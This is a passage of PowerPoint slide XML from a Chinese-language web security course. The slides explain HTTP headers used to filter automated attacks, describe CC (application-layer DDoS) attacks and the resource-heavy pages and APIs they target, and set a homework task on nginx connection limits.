            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21B60CF-EBC5-4168-9E33-053121975CFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>表示客户使用的浏览器类型信息。包含操作系统信息，浏览器内核信息，浏览器版本号。甚至包含浏览器厂商信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>一般情况这个字段都比较长。黑客攻击时，可能使用了某种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>http client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>库，这些库在设置这个字段的时候一般会设置为自己的版权信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>通过对这个字段的过滤，可以拦截一些简单的使用自动化工具导致的攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1204245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A2E62-8AD9-4538-83A5-011F7ADA08E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议关键协议头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—— x-forward-for</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0B9285-8D71-4BF9-829E-AE376DCEBBCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>如果黑客使用了代理，那么这个字段中一般会包含黑客锁使用的真实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>地址。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>通过对这个字段的检测和过滤，可以从源头上拦截黑客的攻击请求。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3214629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9E516-6C74-45AB-86EB-289FAEDB2DFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议关键协议头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE48C26-52E9-499D-9F47-223623AFF071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>这个字段存储有用户访问本页面的上一个页面的地址。通过对这个字段的检测和过滤，可以防止一些自动化工具导致对服务器的攻击和探测。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279839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C7577-E1C4-4190-86AC-EBECC34941C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP CC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88163E88-18D3-43BB-8DE6-0817E5B2F837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" spc="300" dirty="0"/>
              <a:t>通过短时间内对服务器进行大量访问，导致服务器无法及时处理正确请求导致拒绝服务。是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" spc="300" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" spc="300" dirty="0"/>
              <a:t>攻击的一种。在实际环境中，比较消耗资源的地方，性能较低的操作都是导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" spc="300" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" spc="300" dirty="0"/>
              <a:t>攻击产生的原因。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3841199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D23FF-5215-471E-B8D4-05A10BE72179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Home Work</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA8841C-F0FB-4726-830D-D4C58CC74D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>写出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>限制单个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，同时建立连接数不可以超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>个的配置命令。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>提交方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>发送邮件至：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>xudong@ixianlai.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>并抄送至：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>liuyanfang@ixianlai.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75451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79484-8415-4980-B8B2-72EDAA77CD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA1337D-31E9-4F22-9230-F229CD32334B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>有的时候，我们会无意中开发一个非常大的页面供用户使用，或者页面中使用了比较大的资源文件。比如一般管理系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>dashboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>页面。这个页面一般都会包含一些统计类的数据。统计类的数据一般都是通过对数据库数据进行统计查询得到的。这样的页面一般是比较消耗资源的。容易成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>攻击的目标。（比如，新浪首页）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>页面中包含大的资源，比如背景图片。也可能会成为被攻击的对象。虽然大量对背景图片资源的请求，对于设计了缓存的服务器不会产生很大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的消耗，但是会消耗大量的带宽资源。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54957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D97F7-F568-477E-A470-09C47B736A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息列表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3BC81F-71D6-41E5-AAA7-B1D1ED846F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>当页数非常多的时候，一次翻到第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>1w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>页的时候，有可能会让系统产生非常大的压力。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>后台没有合理控制每页显示数量的情况下。有可能会出现通过修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>参数导致一页显示上万条数据的情况。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396053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35111-5066-41B9-B2D5-421BE9FDCC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索页面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{059EF5F5-C173-4716-9148-8C006B883FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>网页对数据的搜索操作一般都是通过操作数据库进行条件查询并且分页之后展示给客户的。搜索页面无法进行缓存。同时对搜索条件的过滤不严格，可能会大大增加数据库的查询压力，这样就有可能会被利用进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>比如：对于支持模糊搜索的地方，用户只输入一个字符。这样因为匹配到的内容会非常多，而导致搜索速度比较慢。或者由于搜索的地方过滤不严格，导致运行用户输入匹配符。这样会导致本来不支持模糊搜索的地方，导致执行模糊搜索而导致压力突增。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138757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CF98E-9E43-4D3F-8A6C-95B88AB6EC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的弱点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C901E06F-B757-48B8-944F-5239678EB74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>一般是没有展示页面，纯粹提供数据的功能。后台实现一般都是通过查询数据库或执行操作之后的结果。一般都是不带缓存的实时数据的返回。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>返回大量信息类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>没有分页。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>返回统计结果的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>被频繁调用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201029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151B7-FFA5-44EA-BA7E-4957E9162B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
